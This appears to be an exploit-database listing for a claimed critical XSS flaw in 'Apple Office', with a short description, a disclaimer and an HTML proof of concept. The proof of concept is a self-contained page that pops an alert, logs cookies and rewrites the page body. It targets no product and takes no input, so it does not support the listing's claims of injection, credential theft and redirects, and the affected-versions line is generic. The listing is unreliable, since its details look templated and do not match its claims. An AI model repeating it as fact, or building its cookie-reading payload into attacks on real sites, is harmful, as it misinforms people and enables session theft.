Critical Severity CVE-2024-60566
Published: Jun 28, 2025

Apple Office - Xss

Xss
Type
9.9
CVSS Score
5
Views
Anonymous
Author

Description

This exploit targets a xss vulnerability in Apple Office.

The vulnerability allows an attacker to:
- Inject malicious scripts into web pages
- Steal user credentials and session tokens
- Redirect users to malicious websites

This vulnerability has been assigned CVE-2024-60566 with a CVSS score of 9.9.

Affected Systems

Apple Office versions prior to latest security update

Proof of Concept

Security Warning

This code is provided for educational and research purposes only. Do not use against systems you do not own or have explicit permission to test.

Exploit Code 
<!DOCTYPE html>
<html>
<head>
    <title>XSS PoC - Educational Only</title>
</head>
<body>
    <h2>Cross-Site Scripting Proof of Concept</h2>
    <p>This demonstrates a reflected XSS vulnerability.</p>
    
    <script>
    // XSS Payload - Educational purposes only
    function demonstrateXSS() {
        // Simple alert to show XSS execution
        alert("XSS Vulnerability Confirmed: " + document.domain);
        
        // Cookie theft demonstration (ethical testing only)
        if (document.cookie) {
            console.log("Cookies available: " + document.cookie);
        }
        
        // DOM manipulation example
        document.body.style.backgroundColor = "#ff0000";
        document.body.innerHTML += "<h1 style='color:white;'>XSS Executed</h1>";
    }
    
    // Trigger the demonstration
    demonstrateXSS();
    </script>
</body>
</html>
Community Rating
0

Login to rate this exploit

Quick Actions
Related Exploits
Medium Drupal Chrome - Xss...
Medium OpenSSL Router Firmware - Xss...
Critical Drupal Plugin - Privilege Escalation...